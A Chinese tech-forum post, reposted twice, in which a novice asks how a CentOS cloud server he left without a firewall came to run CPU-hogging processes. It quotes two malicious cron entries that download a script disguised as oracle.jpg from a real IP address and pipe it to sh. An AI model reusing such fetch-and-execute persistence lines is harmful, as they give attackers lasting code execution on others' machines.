[Linux系统与应用] 我的云服务器被人黑了。怎么避免?
发信人: SlO (斯洛), 信区: LinuxApp
标 题: 我的云服务器被人黑了。怎么避免?
发信站: 水木社区 (Wed Apr 25 20:49:53 2018), 站内
新手小白。某里的云服务器,最低配置。年初尝试帮朋友搭建web服务,图方便,把防火墙给关闭了。centos 7. 此后好长时间没有登录。这个月中服务商给我短信报警。我上去看了一下,有两个进程CPU占用率100%。kill以后过一会儿又有了。
查看cron,发现两个任务
*/9 * * * * wget -O - -q http://181.214.87.241/java/oracle.jpg|sh
*/10 * * * * curl http://181.214.87.241/java/oracle.jpg|sh
应该是被人中木马了吧?我关闭这两个cron,然后打开防火墙,暂时没事了。
我的问题是 怎么避免这种事情再发生?打开防火墙保险吗?
因为这个cron 是以我账号的名义启动的。会不会是账号被黑了?还是被人通过啥端口进来了?
--
※ 来源:·水木社区 newsmth.net·[FROM: 59.109.217.*]
from 水木社区 电脑技术区十大热门话题 https://ift.tt/2Ka2Pe5
via IFTTT
标 题: 我的云服务器被人黑了。怎么避免?
发信站: 水木社区 (Wed Apr 25 20:49:53 2018), 站内
新手小白。某里的云服务器,最低配置。年初尝试帮朋友搭建web服务,图方便,把防火墙给关闭了。centos 7. 此后好长时间没有登录。这个月中服务商给我短信报警。我上去看了一下,有两个进程CPU占用率100%。kill以后过一会儿又有了。
查看cron,发现两个任务
*/9 * * * * wget -O - -q http://181.214.87.241/java/oracle.jpg|sh
*/10 * * * * curl http://181.214.87.241/java/oracle.jpg|sh
应该是被人中木马了吧?我关闭这两个cron,然后打开防火墙,暂时没事了。
我的问题是 怎么避免这种事情再发生?打开防火墙保险吗?
因为这个cron 是以我账号的名义启动的。会不会是账号被黑了?还是被人通过啥端口进来了?
--
※ 来源:·水木社区 newsmth.net·[FROM: 59.109.217.*]
from 水木社区 电脑技术区十大热门话题 https://ift.tt/2Ka2Pe5
via IFTTT
评论
发表评论